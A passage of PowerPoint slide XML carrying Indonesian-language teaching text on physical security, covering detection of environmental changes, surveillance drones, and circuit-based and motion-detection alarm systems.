              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hilang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikenal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Drone/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>kamera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> UAV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada drone </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjangkau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>patroli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>darat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (zdnet.com/article/best-security-surveillance-drones-for-business).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Alarm dan Sensor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Alarm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memainkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melengkapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Alarm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperingatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>petugas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penghuni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gedung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Alarm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>detektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberitahukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriminal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Alarm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diintegrasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kamera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengintai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sensor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gerak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektivitasnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Daftar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjelaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> alarm yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Sirkuit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-Menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> alarm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sirkuit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbunyi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sirkuit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditutup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> alarm. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jendela</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pagar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipotong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Alarm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sirkuit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertutup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikalahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memotong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sirkuit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> alarm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sirkuit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Deteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Gerakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> alarm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gerakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>detektor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipicu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gerakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitivitas</a:t>
            </a:r>
            <a:r>
